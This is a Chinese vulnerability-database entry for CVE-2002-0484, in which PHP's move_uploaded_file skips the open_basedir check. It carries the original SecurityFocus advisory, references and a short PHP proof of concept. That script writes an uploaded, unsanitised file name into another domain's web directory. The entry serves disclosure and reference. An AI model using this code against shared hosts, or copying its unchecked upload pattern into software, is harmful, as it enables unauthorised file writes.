PHP Move_Uploaded_File Open_Basedir欺诈漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106646 漏洞类型 访问验证错误
发布时间 2002-03-17 更新时间 2005-05-02
CVE编号 CVE-2002-0484 CNNVD-ID CNNVD-200208-205
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21347
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-205
|漏洞详情
PHP中的move_uploaded_file不检查基础目录(open_basedir)。远程攻击者可以利用该漏洞下载系统非计划位置文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/4325/info

PHP is a server side scripting language, designed to be embedded within HTML files. It is available for Windows, Linux, and many Unix based operating systems. It is commonly used for web development, and is very widely deployed.

It has been reported that the move_uploaded_file function lacks an open_basedir check. The effect of this issue is that this function may be used to perform file operations on directories outside of those specified by the open_basedir setting.

This vulnerability may not be exploited to overwrite existing files. 

<?

$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file){
if ($size < $size_limit){

move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
|参考资料

来源:BUGTRAQ
名称:20020321Re:move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://online.securityfocus.com/archive/1/263259
来源:BUGTRAQ
名称:20020317move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://online.securityfocus.com/archive/1/262999
来源:bugs.php.net
链接:http://bugs.php.net/bug.php?id=16128
来源:BID
名称:4325
链接:http://www.securityfocus.com/bid/4325
来源:XF
名称:php-moveuploadedfile-create-files(8591)
链接:http://www.iss.net/security_center/static/8591.php
来源:BUGTRAQ
名称:20020322Re:move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=101683938806677&w=2